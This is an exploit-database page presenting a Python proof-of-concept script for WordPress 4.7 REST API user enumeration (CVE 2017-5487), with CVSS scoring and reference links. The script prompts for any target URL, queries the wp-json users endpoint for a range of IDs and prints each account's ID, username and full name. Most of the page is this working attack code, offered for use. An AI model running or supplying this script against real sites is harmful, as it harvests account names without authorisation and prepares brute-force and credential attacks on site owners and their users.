Wordpress >=4.7 wp-json User Enumeration Exploit

2017.01.26
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

import requests import json print "#############################################################" print "\tWordpress 4.7 User Enumeration PoC (CVE 2017-5487)\n\t\t\tWPVDB ID: 8715\n\n\tt\tBy Alienwithin" print "#############################################################\n\n" targetSite = raw_input("Please enter the URL to target e.g. http://target.com : \nSite URL: ") NumberOfUsers = raw_input("Please enter the number of users to retrieve e.g. 10\n") print "ID || Username || Full Name\n\n" for users in range(1, int(NumberOfUsers)): req = requests.get(targetSite+'/wp-json/wp/v2/users/'+str(users)) target_info_parsed = json.loads(req.text) if 'id' not in target_info_parsed: print "No user with ID :" + str(users) req.close() else: target_id = target_info_parsed['id'] target_name = target_info_parsed['name'] target_username = target_info_parsed['slug'] print str(target_id)+ " || "+ str(target_username) + " || "+ str(target_name)+"\n" req.close()

References:

https://wpvulndb.com/vulnerabilities/8715
https://github.com/alienwithin/Scripts-Sploits/blob/master/wp_ue_api.py


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top